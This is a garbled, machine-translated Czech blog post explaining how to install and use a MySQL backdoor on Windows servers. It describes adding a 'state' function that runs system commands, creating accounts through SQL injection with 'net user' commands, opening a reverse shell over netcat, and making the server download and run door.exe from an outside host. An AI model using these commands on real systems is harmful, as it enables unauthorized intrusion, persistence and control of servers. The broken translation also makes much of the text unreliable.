Mysql BackDoor
Zdroj: Puri Manchester
BackDoor mysql se zadní dveře pro vývoj PHP + MySQL server MySQL po zadním vchodem k instalaci přidat "stát" funkce je možné provést systémové příkazy, a začít s procesem MySQL založil DLL cvičenými typu zadní dveře, chytře si uvědomil, bez port, žádný proces, žádné služby prostřednictvím Trojan zdi. programu ve WinXP + Win2003 MYSQL5.0.X, a za průchodu.
Instalace bude Mysql.php rozšířila na serveru PHP, podle vyplnit hostitelské user-password-DB, klikněte na "auto-instalaci MySQL Backdoor"
Po úspěšné instalaci MySQL by se zvýšila o "stát" funkce, zatímco proces Mysql běží čichání zadní dveře tohoto backdoor ve Windows má stejné systémové oprávnění a MySQL.
Využití státních funkcí
Státní funkce je vlastně systém PHP () "funkce stejná funkce může být použita k provedení systémové příkazy, prosím, zadejte příkaz SQL:." Office a vyplnit prohlášení mysql být popraven, jako například "vyberte stav (" net user nohack / přidat "), klikněte na" Spustit SQL poběží výsledky.
Se státní funkce na Sniff zadní dveře, i když WebShell ztratil, jak dlouho jako server, SQL injection bod, můžeme pomocí injekce. PHP? Id = 1 a stav ("net user ')" metoda provádí na serveru .? příkaz Nicméně, pokud vstřikování není to jsme ještě zavolat Sniff zadní dveře kontrolní serveru zasílá každému portu serveru a otevřena MySQL "začátek paketu, bude moci volat Sniff zadní dveře, jako je například.:
Systém běží příkaz: NC ip 80 -> Enter -> mysql-cmd / c net user abc / add> c :/ log.txt (Poznámka: "!" Poslední Nelze vynechat)
2 20082 port nádrže na místním serveru odrazu: první spuštění z nc-lp 20 082 monitorovat stroje 20082 portu a pak nc IP 80 -> Enter -> MySQL-c -> Enter
Nechte serveru stažení: IP nc 80 -> Enter -> mysql-http :/ / www.x.com / door.exe-c mydoor.exe (Pozn.: poslední "Nelze vynechat)
Kromě odesílání "MySQL-c", jiný příkaz je bez odrazu, ale odpovídající příkazy na serveru.
Odinstalace MySQL na útěku "stavu poklesu funkce" může být vyložena, ale zároveň způsobí, že proces mysql ukončit, vrátí do normálu po restartu.










































150 Odezva (y)
Musíte být přihlášen , abyste mohl psát komentář.